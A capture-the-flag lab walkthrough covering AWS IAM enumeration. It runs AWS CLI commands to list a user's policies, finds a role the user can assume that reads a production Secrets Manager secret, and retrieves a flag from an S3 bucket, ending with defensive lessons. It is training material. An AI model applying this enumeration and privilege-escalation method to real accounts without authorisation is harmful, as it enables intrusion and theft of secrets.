AWS IAM Enumeration - Lab Walkthrough #
Overview #
This lab demonstrates systematic AWS Identity and Access Management (IAM) enumeration techniques to discover user permissions, policies, and potential privilege escalation paths.
Learning Objectives:
- Master AWS IAM enumeration methodologies
- Understand the difference between managed and inline policies
- Learn to analyze policy permissions and identify privilege escalation opportunities
- Practice systematic credential and resource discovery
Lab Source: Pwned Labs - Intro to AWS IAM Enumeration
Phase 1: Initial Identity Discovery #
Current User Identification #
First, let’s identify the current AWS identity and permissions:
aws sts get-caller-identity
Result:
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}
Identity Confirmed: Operating as IAM user dev01 in AWS account 794929857501
Detailed User Information #
Let’s gather more detailed information about this user:
aws iam get-user
User Details:
{
"User": {
"Path": "/",
"UserName": "dev01",
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Arn": "arn:aws:iam::794929857501:user/dev01",
"CreateDate": "2023-09-28T21:56:31+00:00",
"PasswordLastUsed": "2025-09-05T18:46:08+00:00",
"Tags": [
{
"Key": "AKIA3SFMDAPOWC2NR5LO",
"Value": "dev01"
}
]
}
}
Key Observations:
- User created on September 28, 2023
- Recently used (password last used on September 5, 2025)
- Tagged with what appears to be an AWS Access Key ID
Phase 2: Group Membership Analysis #
Checking Group Associations #
Users can inherit permissions from groups, so let’s check group memberships:
aws iam list-groups-for-user --user-name dev01
Result:
{
"Groups": []
}
Finding: The user is not a member of any IAM groups, so permissions must be directly attached via policies.
Phase 3: Policy Enumeration #
Managed Policies Analysis #
Let’s identify managed policies attached to the user:
aws iam list-attached-user-policies --user-name dev01
Managed Policies Discovered:
{
"AttachedPolicies": [
{
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
},
{
"PolicyName": "dev01",
"PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
}
]
}
Policy Analysis:
- AmazonGuardDutyReadOnlyAccess - AWS-managed policy providing read-only access to Amazon GuardDuty
- dev01 - Customer-managed policy specifically created for this user
Inline Policies Discovery #
Inline policies are embedded directly into users, groups, or roles and require separate enumeration:
aws iam list-user-policies --user-name dev01
Inline Policies Discovered:
{
"PolicyNames": [
"cloudshell",
"S3_Access"
]
}
Policy Analysis:
- cloudshell - Likely grants access to AWS CloudShell service
- S3_Access - Provides access to specific Amazon S3 resources
Total Policy Count: 4 policies require detailed analysis (2 managed + 2 inline)
Phase 4: Detailed Policy Analysis #
AWS Managed Policy: AmazonGuardDutyReadOnlyAccess #
Check policy versions: (Note: Inline policies don’t support versioning)
aws iam list-policy-versions --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess
Version History:
{
"Versions": [
{
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2021-02-16T23:37:57+00:00"
},
{
"VersionId": "v2",
"IsDefaultVersion": false,
"CreateDate": "2018-04-25T21:07:17+00:00"
},
{
"VersionId": "v1",
"IsDefaultVersion": false,
"CreateDate": "2017-11-28T22:29:40+00:00"
}
]
}
Active Version: v4 (current default version)
Get policy document for active version:
aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --version-id v4
Policy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"guardduty:Describe*",
"guardduty:Get*",
"guardduty:List*"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"organizations:ListDelegatedAdministrators",
"organizations:ListAWSServiceAccessForOrganization",
"organizations:DescribeOrganizationalUnit",
"organizations:DescribeAccount",
"organizations:DescribeOrganization",
"organizations:ListAccounts"
],
"Resource": "*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
}
}
Security Assessment: This policy provides read-only access to GuardDuty and Organizations services. While informational, it doesn’t grant significant privileges for escalation.
Customer Managed Policy: dev01 #
Analyze the custom dev01 policy:
aws iam list-policy-versions --policy-arn arn:aws:iam::794929857501:policy/dev01
Version History:
{
"Versions": [
{
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-10-11T19:59:08+00:00"
},
{
"VersionId": "v6",
"IsDefaultVersion": false,
"CreateDate": "2023-10-11T19:47:41+00:00"
},
{
"VersionId": "v5",
"IsDefaultVersion": false,
"CreateDate": "2023-10-07T22:48:28+00:00"
},
{
"VersionId": "v4",
"IsDefaultVersion": false,
"CreateDate": "2023-10-02T20:38:35+00:00"
},
{
"VersionId": "v3",
"IsDefaultVersion": false,
"CreateDate": "2023-10-02T20:29:52+00:00"
}
]
}
Active Version: v7 (multiple revisions suggest active development) Get policy document for v7:
aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/dev01 --version-id v7
Policy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"iam:GetRole",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListGroupsForUser",
"iam:ListAttachedUserPolicies",
"iam:ListUserPolicies",
"iam:GetUser",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Resource": [
"arn:aws:iam::794929857501:user/dev01",
"arn:aws:iam::794929857501:role/BackendDev",
"arn:aws:iam::794929857501:policy/BackendDevPolicy",
"arn:aws:iam::794929857501:policy/dev01",
"arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
]
}
]
},
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T19:59:08+00:00"
}
}
Critical Discovery: This policy grants extensive IAM read permissions, including access to inspect roles and policies. Most importantly, it references a BackendDev role and BackendDevPolicy - potential privilege escalation targets!
Phase 5: Role Discovery and Analysis #
BackendDev Role Investigation #
Enumerate policies attached to the BackendDev role:
aws iam list-attached-role-policies --role-name BackendDev
Result:
{
"AttachedPolicies": [
{
"PolicyName": "BackendDevPolicy",
"PolicyArn": "arn:aws:iam::794929857501:policy/BackendDevPolicy"
}
]
}
Finding: The BackendDev role has the BackendDevPolicy attached. This creates a potential privilege escalation pathway.
Role Trust Policy Analysis #
Examine the BackendDev role details:
aws iam get-role --role-name BackendDev
Role Configuration:
{
"Role": {
"Path": "/",
"RoleName": "BackendDev",
"RoleId": "AROA3SFMDAPO2RZ36QVN6",
"Arn": "arn:aws:iam::794929857501:role/BackendDev",
"CreateDate": "2023-09-29T12:30:29+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::794929857501:user/dev01"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Grant permissions to backend developers",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2025-09-05T21:59:04+00:00",
"Region": "us-east-1"
}
}
}
Critical Finding: The trust policy explicitly allows our current user (dev01) to assume this role! This is a clear privilege escalation opportunity.
BackendDevPolicy Analysis #
Get policy metadata:
aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy
Policy Metadata:
{
"Policy": {
"PolicyName": "BackendDevPolicy",
"PolicyId": "ANPA3SFMDAPO7OINIQIRR",
"Arn": "arn:aws:iam::794929857501:policy/BackendDevPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Policy defining permissions for backend developers",
"CreateDate": "2023-09-29T12:44:09+00:00",
"UpdateDate": "2023-09-29T12:44:09+00:00",
"Tags": []
}
}
Get the policy document for version v1:
aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --version-id v1
BackendDevPolicy Document:
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"secretsmanager:ListSecrets"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"secretsmanager:GetSecretValue",
"secretsmanager:DescribeSecret"
],
"Resource": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf"
}
]
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-29T12:44:09+00:00"
}
}
Key Discovery: This policy grants access to AWS Secrets Manager, including the ability to retrieve a specific secret: prod/Customers-QUhpZf. This could contain sensitive credentials or database connection strings!
Phase 6: Inline Policy Analysis #
S3_Access Policy Investigation #
Analyze the S3_Access inline policy:
aws iam get-user-policy --user-name dev01 --policy-name S3_Access
S3_Access Policy Document:
{
"UserName": "dev01",
"PolicyName": "S3_Access",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::hl-dev-artifacts",
"arn:aws:s3:::hl-dev-artifacts/*"
]
}
]
}
}
Discovery: This policy grants read access to the hl-dev-artifacts S3 bucket. This could contain the lab flag!
Phase 7: Resource Enumeration and Flag Discovery #
S3 Bucket Investigation #
List contents of the hl-dev-artifacts bucket:
aws s3 ls s3://hl-dev-artifacts
Bucket Contents:
2023-10-01 20:39:53 1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 20:39:53 214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 20:38:05 32 flag.txt
Target Acquired: The flag.txt file is present in the bucket!
Download the flag:
aws s3 cp s3://hl-dev-artifacts/flag.txt .
Flag Retrieved:
xyz123
Mission Accomplished!
Key Takeaways #
Attack Chain Summary #
- Initial Enumeration: Started with basic identity discovery using
aws sts get-caller-identity - Permission Mapping: Systematically enumerated all attached and inline policies
- Policy Analysis: Analyzed policy documents to understand granted permissions
- Privilege Discovery: Identified assumable role with expanded permissions
- Resource Access: Located and accessed S3 bucket containing the flag
IAM Enumeration Methodology #
- Identity Discovery: Who am I? (
aws sts get-caller-identity) - User Details: What are my attributes? (
aws iam get-user) - Group Membership: What groups provide inherited permissions?
- Managed Policies: What AWS and customer-managed policies are attached?
- Inline Policies: What embedded policies exist?
- Policy Analysis: What specific permissions do these policies grant?
- Role Discovery: What roles can I assume for privilege escalation?
- Resource Enumeration: What resources can I access with current permissions?
Security Lessons #
- Principle of Least Privilege: The dev01 user had more permissions than necessary
- Policy Versioning: Multiple policy versions can indicate ongoing changes and potential misconfigurations
- Role Assumption: Trust policies should be carefully reviewed to prevent unintended privilege escalation
- Resource-Based Access: S3 bucket policies and inline policies can provide unexpected access paths
- Enumeration Detection: These activities generate CloudTrail logs and should be monitored